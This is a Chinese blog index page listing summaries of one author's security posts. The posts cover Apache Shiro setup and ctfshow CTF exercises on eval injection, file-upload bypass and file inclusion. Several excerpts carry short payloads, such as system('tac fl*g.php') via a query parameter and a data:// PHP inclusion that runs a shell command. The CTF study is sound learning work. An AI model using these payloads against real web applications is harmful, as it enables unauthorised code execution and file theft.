摘要:
一、Springboot项目运行出现的种种问题: 首先需要下载环境代码,来源 Github 等开源平台,下载解压后使用 IDEA打开,由于 Shiro 通常与 Springboot 项目捆绑,所以通常运行需要 Springboot环境,如下图所示: 运行时可能会出现如下报错: unable to s 阅读全文
posted @ 2024-09-22 15:44
不会下雨的晴天
阅读(69)
评论(0)
推荐(0)
摘要:
一、Apache Shiro 简介: Apache Shiro提供了认证、授权、加密和会话管理功能,将复杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实现此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。 阅读全文
posted @ 2024-09-21 11:25
不会下雨的晴天
阅读(533)
评论(0)
推荐(0)
摘要:
一、eval()函数调用--无严格过滤: 1、highlight_file()高亮显示: ?c=highlight_file(base64_decode("ZmxhZy5waHA=")); 2、shell命令: ?c=system("tac fl*g.php"); ?c=system("cat fl 阅读全文
posted @ 2024-08-16 12:36
不会下雨的晴天
阅读(630)
评论(0)
推荐(0)
摘要:
一、仅做前端检测,未做后端校验:(ctfshow-web152) 不允许上传 .php等格式的文件 1、禁用 javascript 2、先上传符合格式要求的 .png图片 --> Burpsuite修改后缀为 .php 绕过前端检测 二、.user.ini文件利用:(ctfshow-web153) 阅读全文
posted @ 2024-08-14 12:06
不会下雨的晴天
阅读(148)
评论(0)
推荐(0)
摘要:
文件包含与伪协议 一、无任何过滤措施的文件包含漏洞:(ctfshow-web78): 1、data://协议: ?file=data://text/plain,<?php system('tac flag.php');?> 2、php://filter协议: ?file=php://filter/r 阅读全文
posted @ 2024-08-12 15:38
不会下雨的晴天
阅读(446)
评论(0)
推荐(0)
摘要:
个人Blog的第一篇博文 正式加入"博客园"大家庭了,希望以后可以一直坚持下去欸。 阅读全文
posted @ 2024-08-11 19:02
不会下雨的晴天
阅读(36)
评论(0)
推荐(0)
浙公网安备 33010602011771号